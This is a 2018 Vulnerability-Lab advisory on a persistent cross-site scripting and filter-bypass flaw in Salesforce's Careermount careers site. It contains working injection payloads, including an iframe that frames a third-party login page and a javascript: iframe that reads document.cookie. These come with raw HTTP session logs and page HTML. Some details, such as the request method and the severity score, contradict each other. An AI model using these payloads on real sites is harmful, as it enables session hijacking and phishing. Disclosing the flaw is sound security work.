Document Title:
===============
Salesforce Careermount - Bypass & XSS Web Vulnerability


Date:
=====
2018-07-04


References:
===========
https://www.vulnerability-lab.com/get_content.php?id=1969


VL-ID:
=====
1969


Common Vulnerability Scoring System:
====================================
4


Vulnerability Class:
====================
Cross Site Scripting - Persistent


Introduction:
=============
There's never been a better time to work at salesforce.com, the fastest growing of the top 10 enterprise software companies. 
And this is just the beginning for us. Salesforce.com is growing at an amazing rate, with new career opportunities opening 
up every day. Whether you're an account executive in Sydney or a quality engineer in San Francisco, you're likely to find 
just the role you've been looking for. Start searching now!

(Copy of the Vendor Homepage:  http://salesforce.careermount.com )



Abstract:
=========
The vulnerability laboratory core research team discovered a persistent vulnerability in the official Salesforce Careermount online service web-application.




Report-Timeline:
================
2018-07-05: Public Disclosure (Vulnerability Laboratory)


Status:
========
Published


Affected Products:
==================

Exploitation-Technique:
=======================
Remote


Severity:
=========
Medium


Details:
========
A persistent cross site scripting web vulnerability has been discovered in the official Salesforce Careermount web-application.
The vulnerability allows remote attackers to inject own malicious script codes on the application-side of the vulnerable module.

The vulnerability is located in the `/main/sendform/8/8/27051/1/` modules GET method request. Remote attackers are able to use 
the Send to Friends function of the application to send malicious script codes. The validation process of the mechanism does not 
parse the input/output of the sendform context. The execution occurs in the /main/sendform/8/8/27051/1/` module context after the 
review of the about me page via GET method request. The attack vector is persistent on the application-side and the request method 
to inject the payload is POST. 

The security risk of the cross site web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.9. 
Exploitation of The persistent vulnerability requires a low privileged web-application user account and low or medium user interaction. 
Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to 
malicious source and persistent manipulation of affected or connected application modules.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] /main/sendform/8/8/27051/1/


Proof of Concept:
=================
The AKA Persistent Cross Site Type I web Vulnerability can be exploited by remote attackers with low privileged web-application user account and low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.


Salesforce Careermount website owner use XSS filters(WAF) to protect against XSS vulnerability.
For eg: if I put the "><img src=x onerror=prompt(0);> , There is nothing ....

<form id="dynamicEntity" onkeypress="submitFormOnEnter(event, function() { doAjaxSubmit('validate', 'dynamicEntity'); });" action="/main/sendform/8/8/27051/1/"><img src="x" onerror="prompt(0)&quot;" method="post">                        <div class="fline fline_first_name" onfocus="" id="p205"><span id="dynamicEntity.values[0].value.errors" class="errmsg"></span> <label>First Name: <em class="note">*</em></label> <span class="input"> <input id="field205" name="values[0].string" class="txt " tabindex="8" value="" maxlength="256" autocomplete="on" type="text">  </span> </div>                               <div class="fline fline_last_name" onfocus="" id="p206"><span id="dynamicEntity.values[1].value.errors" class="errmsg"></span> <label>Last Name: <em class="note">*</em></label> <span class="input"> <input id="field206" name="values[1].string" class="txt " tabindex="8" value="" maxlength="256" autocomplete="on" type="text">  </span> </div>                               <div class="fline fline_from" onfocus="" id="p207"><span id="dynamicEntity.values[2].value.errors" class="errmsg"></span> <label>Email (From): <em class="note">*</em></label> <span class="input"> <input id="field207" name="values[2].string" class="txt " tabindex="8" value="" maxlength="256" autocomplete="on" type="text">  </span> </div>                               <div class="fline fline_friends_email" onfocus="" id="p209"><span id="dynamicEntity.values[3].value.errors" class="errmsg"></span> <label>Friend's email: <em class="note">*</em></label> <span class="input"> <input id="field209" name="values[3].string" class="txt " tabindex="8" value="" maxlength="256" autocomplete="on" type="text">  </span> </div>         <div class="formbut"> <div class="but_st"><input name="submit.dynamicEntity" tabindex="8" value="Send" title="Send" onclick="doAjaxSubmit('validate', 'dynamicEntity');" type="button"></div> </div> <span id="dynamicEntity.has.errors" class="error"></span>  </form>


this script won't work. Likewise Filters use different type of filtering method to give protection against the XSS.
In this case, we can use some tricks to bypass the filter....;) 

Now open your Mind and i will show you some trick to bypassing the filter 


[+] Steps : 


Salesforce Careermount Missing HTTP Header "X-Frame-Options" => Clickjacking Defense


--- PoC Session Logs [GET] ---
GET /main/sendform/8/8/27051/1/ HTTP/1.1
Host: salesforce.careermount.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: __utma=10312119.1519791206.1474808514.1475650796.1475658149.7; __utmz=10312119.1474808514.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __atuvc=68%7C39%2C31%7C40; __atssc=google%3B2; logged=""; __utmc=10312119; JSESSIONID=1DD6A5C48971382BB4D225F710D13E5D.node01; __utmb=10312119.23.10.1475658149; __atuvs=57f4c1a51c6e0142016; __utma=74538496.1743178715.1475659339.1475659339.1475659339.1; __utmc=74538496; __utmz=74538496.1475659339.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 05 Oct 2016 09:53:20 GMT
Content-Type: text/html;charset=utf-8
Set-Cookie: JSESSIONID=1DD6A5C48971382BB4D225F710D13E5D.node01; Expires=Wed, 05-Oct-2016 11:53:20 GMT; Path=/
Set-Cookie: logged=""; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store
Content-Language: en-US
Content-Encoding: gzip
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding


Note : The Clickjacking web attack is not Exploitable in Salesforce Careermount


now we want to iframe another site like " portal.fullcontact.com" vulnerable to clickjacking in the Salesforce Careermount using this payload :

====> "><iframe src="https://portal.fullcontact.com"></iframe>

Successful iframe of the vulnerable fullcontact site to clickjacking web attack in the Salesforce Careermount web application


POC Picture =====> prnt.sc/cq291c

--- PoC Session Logs [GET] ---
GET /main/sendform/8/8/27051/1/%22%3E%3Ciframe%20src=%22https://portal.fullcontact.com%22%3E%3C/iframe%3E HTTP/1.1
Host: salesforce.careermount.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: __utma=10312119.1519791206.1474808514.1475650796.1475658149.7; __utmz=10312119.1474808514.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __atuvc=68%7C39%2C34%7C40; __atssc=google%3B2; logged=""; __utmc=10312119; JSESSIONID=1DD6A5C48971382BB4D225F710D13E5D.node01; __utmb=10312119.26.10.1475658149; __atuvs=57f4c1a51c6e0142019; __utma=74538496.1743178715.1475659339.1475659339.1475659339.1; __utmc=74538496; __utmz=74538496.1475659339.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 05 Oct 2016 10:06:17 GMT
Content-Type: text/html;charset=utf-8
Set-Cookie: JSESSIONID=1DD6A5C48971382BB4D225F710D13E5D.node01; Expires=Wed, 05-Oct-2016 12:06:17 GMT; Path=/
Set-Cookie: logged=""; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store
Content-Language: en-US
Content-Encoding: gzip
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding


GET /candidate/registration?formId=0&source=%2Fmain%2Fsendform%2F8%2F8%2F27051%2F1%2F%2522%253E%253Ciframe%2520src%3D%2522https%3A%2F%2Fportal.fullcontact.com%2522%253E%253C%2Fiframe%253E HTTP/1.1
Host: salesforce.careermount.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
SpecialAjaxRequest: true
Referer: http://salesforce.careermount.com/main/sendform/8/8/27051/1/%22%3E%3Ciframe%20src=%22https://portal.fullcontact.com%22%3E%3C/iframe%3E
Cookie: __utma=10312119.1519791206.1474808514.1475650796.1475658149.7; __utmz=10312119.1474808514.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __atuvc=68%7C39%2C34%7C40; __atssc=google%3B2; logged=""; __utmc=10312119; JSESSIONID=1DD6A5C48971382BB4D225F710D13E5D.node01; __utmb=10312119.27.10.1475658149; __atuvs=57f4c1a51c6e0142019; __utma=74538496.1743178715.1475659339.1475659339.1475659339.1; __utmc=74538496; __utmz=74538496.1475659339.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1
Connection: keep-alive
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 05 Oct 2016 10:06:18 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=1DD6A5C48971382BB4D225F710D13E5D.node01; Expires=Wed, 05-Oct-2016 12:06:18 GMT; Path=/
Set-Cookie: logged=""; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store
Content-Language: en-US
Content-Encoding: gzip
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding


GET /signin/ HTTP/1.1
Host: portal.fullcontact.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://salesforce.careermount.com/main/sendform/8/8/27051/1/%22%3E%3Ciframe%20src=%22https://portal.fullcontact.com%22%3E%3C/iframe%3E
Cookie: _ga=GA1.3.1543174033.1474818957; aperture.sails.sid=s%3ALdZ5C6Rlp8xlZeO1JWmA_xVK-lYpBafq.xsGkYNdeyiJWf4h5ii9HwCsPI4oxbcD7LfadGxL2Tec; _dc_gtm_UA-12693956-15=1; _dc_gtm_UA-12693956-33=1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html; charset=utf-8
Date: Wed, 05 Oct 2016 10:06:20 GMT
Server: nginx/1.4.6 (Ubuntu)
X-Powered-By: Sails <sailsjs.org>
Content-Length: 3535
Connection: keep-alive


[+] HTML POC : 

<html><head>
    <title>FullContact API Developer Portal</title>
    <meta charset="UTF-8">
    <meta http-equiv="Content-Language" content="en">
    <meta name="description" content="">
    <meta name="author" content="FullContact">
    <!-- Viewport mobile tag for sensible mobile support -->
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    
    <link rel="shortcut icon" href="https://fullcontact-static.s3.amazonaws.com/images/website/favicon.png" type="image/png">
    <!--STYLES GLOBAL-->
    <link rel="stylesheet" type="text/css" href="/min/global.min.css?v=92cd824620d721edd03e082239f39b259c861a41">
    <!--STYLES GLOBAL END-->
    
      <link rel="stylesheet" href="/styles/pages/signin.css?v=92cd824620d721edd03e082239f39b259c861a41">
    
  <script src="//connect.facebook.net/en_US/fbevents.js" async=""></script><script src="//www.googleadservices.com/pagead/conversion_async.js" async="" type="text/javascript"></script><script src="https://www.google-analytics.com/analytics.js" async="" type="text/javascript"></script><script src="/js/pages/signin.js?v=92cd824620d721edd03e082239f39b259c861a41" data-requiremodule="/js/pages/signin.js?v=92cd824620d721edd03e082239f39b259c861a41" data-requirecontext="_" async="" charset="utf-8" type="text/javascript"></script><style type="text/css"></style><script src="/js/generated/environment.js" data-requiremodule="environment" data-requirecontext="_" async="" charset="utf-8" type="text/javascript"></script></head>
  <body>
    <script src="//www.googletagmanager.com/gtm.js?id=GTM-55Q93M" async=""></script><script type="text/javascript" src="/js/require.config.js?v=92cd824620d721edd03e082239f39b259c861a41"></script>
    

<div class="portal">
  <header data-vm="signin">
    <a class="logo"><svg width="48px" height="35px" viewBox="0 0 48 35" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:sketch="http://www.bohemiancoding.com/sketch/ns">
  <g id="Page-1" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd" sketch:type="MSPage">
    <g id="home" sketch:type="MSArtboardGroup" transform="translate(-21.000000, -28.000000)" fill="#FFFFFF">
      <g id="navigation" sketch:type="MSLayerGroup">
        <g id="logo-block" sketch:type="MSShapeGroup">
          <path d="M67.9556913,34.6697165 L66.9786807,34.5655288 L66.9786807,33.278174 C66.9786807,32.6224169 66.4572128,32.091987 65.8130091,32.091987 L65.2069615,32.091987 L65.1847037,31.7962492 C65.1357366,31.142002 64.5754765,30.6532041 63.9336046,30.7032488 L46.1269573,32.091987 L43.7854389,32.091987 L38.9285795,31.5738526 L39.1216923,29.7032192 C39.1494615,29.4288366 38.9533811,29.1814177 38.6826841,29.1525126 L27.9024997,28.0027805 C27.6311668,27.9738755 27.3892989,28.1736225 27.3608938,28.4486522 L27.2309507,29.7105533 L25.2949479,29.7105533 C25.0227671,29.7105533 24.8020971,29.9340284 24.8020971,30.2116466 L24.8020971,31.3665557 L23.3547055,31.4791561 C23.0833726,31.5005114 22.8798729,31.7410275 22.9012827,32.0182143 L22.9394389,32.5253476 C22.7723996,32.7307031 22.668106,32.9904174 22.668106,33.278174 L22.668106,33.9207728 L22.077109,33.9671504 C21.4346011,34.017195 20.954469,34.5875311 21.0034361,35.2398369 L22.4864401,54.9362785 L22.2496598,57.236174 C22.207476,57.6466693 22.377271,58.030201 22.668318,58.2745999 L22.668318,59.3835629 C22.668318,59.6316289 22.7437824,59.861791 22.8716057,60.0524783 L22.9633925,61.2701588 C23.0127836,61.9233274 23.5730437,62.4127725 24.2151276,62.3620807 L33.9879885,61.6006259 L33.8243408,59.4336075 L33.6354677,59.4487071 L33.6354677,58.3982015 L32.7252305,58.3982015 C31.8516657,58.3982015 31.1445042,57.6777315 31.1445042,56.7894395 C31.1445042,55.9005003 31.8516657,55.1800303 32.7252305,55.1800303 L37.0917828,55.1800303 C37.9647117,55.1800303 38.6720851,55.9005003 38.6720851,56.7894395 C38.6720851,57.6777315 37.9649237,58.3982015 37.0917828,58.3982015 L36.1806977,58.3982015 L36.1806977,60.5691027 L36.4634775,60.5691027 L36.5262233,61.4021731 L44.3825834,60.7899893 L53.3713345,61.7490341 L53.4930103,60.568887 L54.0823115,60.568887 L54.0823115,58.3984172 L53.1720744,58.3984172 C52.2989335,58.3984172 51.5911361,57.6779472 51.5911361,56.7896552 C51.5911361,55.900716 52.2989335,55.180246 53.1720744,55.180246 L57.5384147,55.180246 C58.4113436,55.180246 59.1193529,55.900716 59.1193529,56.7896552 C59.1193529,57.6779472 58.4113436,58.3984172 57.5384147,58.3984172 L56.6277535,58.3984172 L56.6277535,59.9118356 L56.1253637,59.8585553 L55.9036338,62.0186711 L65.0380144,62.9934626 C65.6792504,63.0616269 66.2520172,62.5890072 66.3194265,61.9369171 L66.4826502,60.352746 C66.7819644,60.1385464 66.9786807,59.7854298 66.9786807,59.38421 L66.9786807,58.5280587 C67.1001446,58.3239974 67.1643742,58.082187 67.1450841,57.8257083 L66.9786807,55.6159794 L68.9935397,35.9736809 C69.060737,35.3220222 68.5960794,34.7378807 67.9556913,34.6697165 Z M47.252565,52.2569498 L36.6425996,52.2569498 L36.6425996,50.2148272 C36.6425996,48.015021 37.9384263,46.125405 39.7945131,45.2841377 C38.7040939,44.5656091 37.982306,43.3188077 37.982306,41.8987916 C37.982306,39.6711588 39.7576288,37.8641596 41.9475823,37.8641596 C44.1377478,37.8641596 45.9132826,39.6711588 45.9132826,41.8987916 C45.9132826,43.3188077 45.1902228,44.5658248 44.1010754,45.2841377 C45.9563143,46.125405 47.252565,48.015021 47.252565,50.2148272 L47.252565,52.2569498 Z M54.9041535,50.2167686 L50.459381,50.2167686 L50.459381,49.481199 C50.459381,47.2809613 49.1624944,45.3915611 47.3076795,44.5511565 C48.3966148,43.831118 49.1200987,42.5853952 49.1200987,41.1655947 C49.1200987,39.4123073 48.0188685,37.9236955 46.4830818,37.3671648 C47.2097453,36.428181 48.3338691,35.8231156 49.5995948,35.8231156 C51.7893363,35.8231156 53.5644472,37.6301147 53.5644472,39.8583947 C53.5644472,41.279058 52.8418113,42.5247808 51.752028,43.2443879 C53.6079029,44.0847924 54.9043655,45.9746241 54.9043655,48.1755089 L54.9043655,50.2167686 L54.9041535,50.2167686 Z" id="logo"></path>
        </g>
      </g>
    </g>
  </g>
</svg>
</a>
  </header>
  <section data-vm="signin">
    <div class="sign-in-form">
      
        <h1 class="title">Sign in to FullContact</h1>
      
      <form method="POST" action="/authentication/authenticate">
        <input name="_csrf" value="vAcJHZtM-_ubo6C7EQfT1BO7-6yqmj5m_lcI" type="hidden">
        
        <input class="form-icon person" value="" name="email" id="email" placeholder="Email" autofocus="" type="text">
        <input class="form-icon password" name="password" id="password" placeholder="Password" type="password">
        <button class="btn aqua large ladda-button" data-style="zoom-out" data-bind="ladda_click: true"><span class="ladda-label">Sign In</span><span class="ladda-spinner"></span></button>
        <p><a data-bind="click: forgotPassword">Forgot Password?</a></p>
        
      </form>
      <footer class="copyright-and-terms">
    © <span class="copyright">2011 - 2016</span> FullContact, Inc. • <a href="https://www.fullcontact.com/terms/" target="_blank">Terms of Use</a> • <a href="https://www.fullcontact.com/privacy/" target="_blank">Privacy Policy</a>
</footer>
    </div>
    <input id="flash-message" value="" type="hidden">
  </section>
</div>
<script data-main="/js/pages/signin.js?v=92cd824620d721edd03e082239f39b259c861a41" src="/js/dependencies/require.js?v=92cd824620d721edd03e082239f39b259c861a41"></script>

    <div class="overlay" id="overlay"></div>
    <!-- Google Tag Manager -->
    <noscript><iframe src="//www.googletagmanager.com/ns.html?id=GTM-55Q93M"
                      height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
    <script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
              new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
              j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
              '//www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
      })(window,document,'script','dataLayer','GTM-55Q93M');</script>
    <!-- End Google Tag Manager -->
  

<div style="display: none; visibility: hidden;">
<script>!function(b,e,f,g,a,c,d){b.fbq||(a=b.fbq=function(){a.callMethod?a.callMethod.apply(a,arguments):a.queue.push(arguments)},b._fbq||(b._fbq=a),a.push=a,a.loaded=!0,a.version="2.0",a.queue=[],c=e.createElement(f),c.async=!0,c.src=g,d=e.getElementsByTagName(f)[0],d.parentNode.insertBefore(c,d))}(window,document,"script","//connect.facebook.net/en_US/fbevents.js");fbq("init","192902281044014");fbq("track","PageView");</script>
<noscript></noscript>
</div><div style="display: none; visibility: hidden;">
<script type="text/javascript" src="//platform.twitter.com/oct.js"></script>
<script type="text/javascript">twttr.conversion.trackPid("nuo93",{tw_sale_amount:0,tw_order_quantity:0});</script>
<noscript></noscript>
</div><script type="text/javascript" src="https://analytics.twitter.com/i/adsct?p_id=Twitter&amp;p_user_id=0&amp;txn_id=nuo93&amp;tw_sale_amount=0&amp;tw_order_quantity=0&amp;tw_iframe_status=1&amp;tw_document_referrer=http%3A%2F%2Fsalesforce.careermount.com%2Fmain%2Fsendform%2F8%2F8%2F27051%2F1%2F%2522%253E%253Ciframe%2520src%3D%2522https%3A%2F%2Fportal.fullcontact.com%2522%253E%253C%2Fiframe%253E&amp;tpx_cb=twttr.conversion.loadPixels"></script></body></html>


now !!! We want to exploiting the Missing of the defending against "iframe" HTTP Header "X-Frame-Options" to iframe an AKA Persistent Cross Site Type I web Vulnerability using this payload :

====> "><iframe src="javascript:alert(document.cookie)"></iframe>


--- PoC Session Logs [GET] ---
GET /main/sendform/8/8/27051/1/%22%3E%3Ciframe%20src=%22javascript:alert(document.cookie)%22%3E%3C/iframe%3E HTTP/1.1
Host: salesforce.careermount.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: __utma=10312119.1519791206.1474808514.1475650796.1475658149.7; __utmz=10312119.1474808514.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __atuvc=68%7C39%2C39%7C40; __atssc=google%3B2; logged=""; __utmc=10312119; JSESSIONID=1DD6A5C48971382BB4D225F710D13E5D.node01; __utmb=10312119.31.10.1475658149; __atuvs=57f4c1a51c6e014201e; __utma=74538496.1743178715.1475659339.1475659339.1475659339.1; __utmc=74538496; __utmz=74538496.1475659339.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html;charset=utf-8
Set-Cookie: JSESSIONID=1DD6A5C48971382BB4D225F710D13E5D.node01; Expires=Wed, 05-Oct-2016 12:30:34 GMT; Path=/
Set-Cookie: logged=""; Path=/
Pragma: no-cache
Cache-Control: no-cache, no-store
Content-Language: en-US
Content-Encoding: gzip
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding



PoC: HTML
<div class="main">
<form id="dynamicEntity" onkeypress="submitFormOnEnter(event, function() { doAjaxSubmit('validate', 'dynamicEntity'); });" action="/main/sendform/8/8/27051/1/"><iframe src="javascript:alert(document.cookie)"></iframe>" method="post"&gt; 
<div class="fline fline_first_name" onfocus="" id="p205"><span id="dynamicEntity.values[0].value.errors" class="errmsg"></span> <label>First Name: <em class="note">*</em></label> <span class="input"> <input id="field205" name="values[0].string" class="txt " tabindex="8" value="" maxlength="256" autocomplete="on" type="text">  </span> </div>                               <div class="fline fline_last_name" onfocus="" id="p206"><span id="dynamicEntity.values[1].value.errors" class="errmsg"></span> <label>Last Name: <em class="note">*</em></label> <span class="input"> <input id="field206" name="values[1].string" class="txt " tabindex="8" value="" maxlength="256" autocomplete="on" type="text">  </span> </div>                               <div class="fline fline_from" onfocus="" id="p207"><span id="dynamicEntity.values[2].value.errors" class="errmsg"></span> <label>Email (From): <em class="note">*</em></label> <span class="input"> <input id="field207" name="values[2].string" class="txt " tabindex="8" value="" maxlength="256" autocomplete="on" type="text">  </span> </div>                               <div class="fline fline_friends_email" onfocus="" id="p209"><span id="dynamicEntity.values[3].value.errors" class="errmsg"></span> <label>Friend's email: <em class="note">*</em></label> <span class="input"> <input id="field209" name="values[3].string" class="txt " tabindex="8" value="" maxlength="256" autocomplete="on" type="text">  </span> </div>         <div class="formbut"> <div class="but_st"><input name="submit.dynamicEntity" tabindex="8" value="Send" title="Send" onclick="doAjaxSubmit('validate', 'dynamicEntity');" type="button"></div> </div> <span id="dynamicEntity.has.errors" class="error"></span>  </form>                                                                                                                                                        
<br>
<br>
<div class="left-20-only-scr4 left-5 left"><!-- right content -->
<!--h5 class="flush">Find your #dreamjob <a class="margin-left-20 btn-round font-white bg-gradient-darkblue font-16 fix-driver" title="Search jobs" href="/cm/candidate/search_jobs" target="_blank" onclick="s_objectID=&quot;http://careers.force.com/jobs_1&quot;;return this.s_oc?this.s_oc(e):true">Search jobs ›</a></h5-->
<!--Link to leadform--> <!--div class="top-30">Didn't find your #dreamjob opening today? <a href="http://www.salesforce.com/form/careers/dreamjob-web.jsp">Leave your info so we know you're interested!</a></div--> <!-- Follow us  -->
<div class="clear"></div>
<div class="left font-14 font-gray-2 right-10 top-30">Follow us</div>
<!-- Follow us links -->
<div class="left sfdc-widget clearfix top-20">
<p><a href="http://www.facebook.com/salesforce" target="_blank" onclick="s_objectID=&quot;http://www.facebook.com/salesforce_1&quot;;return this.s_oc?this.s_oc(e):true"><img alt="" src="http://www.sfdcstatic.com/common/assets/img/social/facebook_32.png"></a>  	                                      <a href="http://twitter.com/salesforcejobs" target="_blank" onclick="s_objectID=&quot;http://twitter.com/salesforcejobs_1&quot;;return this.s_oc?this.s_oc(e):true"><img alt="" src="http://www.sfdcstatic.com/common/assets/img/social/twitter_32.png"></a>                                           	                                     <a href="https://www.linkedin.com/company/salesforce" target="_blank" onclick="s_objectID=&quot;https://www.linkedin.com/company/salesforce_1&quot;;return this.s_oc?this.s_oc(e):true"><img alt="" src="http://www.sfdcstatic.com/common/assets/img/social/linkedin_32.png"></a>  <a href="http://www.instagram.com/salesforcedreamjob" target="_blank" onclick="s_objectID=&quot;http://www.instagram.com/salesforcedreamjob_1&quot;;return this.s_oc?this.s_oc(e):true"><img alt="" src="http://www.sfdcstatic.com/common/assets/img/social/instagram_32.png"></a>  	                                      <a href="http://www.youtube.com/salesforce" target="_blank" onclick="s_objectID=&quot;http://www.youtube.com/salesforce_1&quot;;return this.s_oc?this.s_oc(e):true"><img alt="" src="http://www.sfdcstatic.com/common/assets/img/social/youtube_32.png"></a>                                           	                                     <a href="/candidate/job_search/quick/results?rss" target="_blank" onclick="s_objectID=&quot;http://blogs.salesforce.com/company/careers/_1&quot;;return this.s_oc?this.s_oc(e):true"><img alt="" src="http://www.sfdcstatic.com/common/assets/img/social/blog_32.png"></a></p>
</div>
<!-- end right content --></div>
</div>


PoC Picture: prnt.sc/cq2iis


Risk:
=====
The security risk of vulnerability in the Salesforce Careermount online service web-application is estimated as medium.


Credits:
========
Vulnerability-Lab [research@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab


Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, 
deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com 		- www.vuln-lab.com 						- www.evolution-sec.com
Section:    magazine.vulnerability-lab.com 	- vulnerability-lab.com/contact.php 				- evolution-sec.com/contact
Social:	    twitter.com/vuln_lab		- facebook.com/VulnerabilityLab 				- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php 	- vulnerability-lab.com/rss/rss_upcoming.php 			- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php 	- vulnerability-lab.com/list-of-bug-bounty-programs.php 	- vulnerability-lab.com/register.php

Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark 
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission.

				    Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™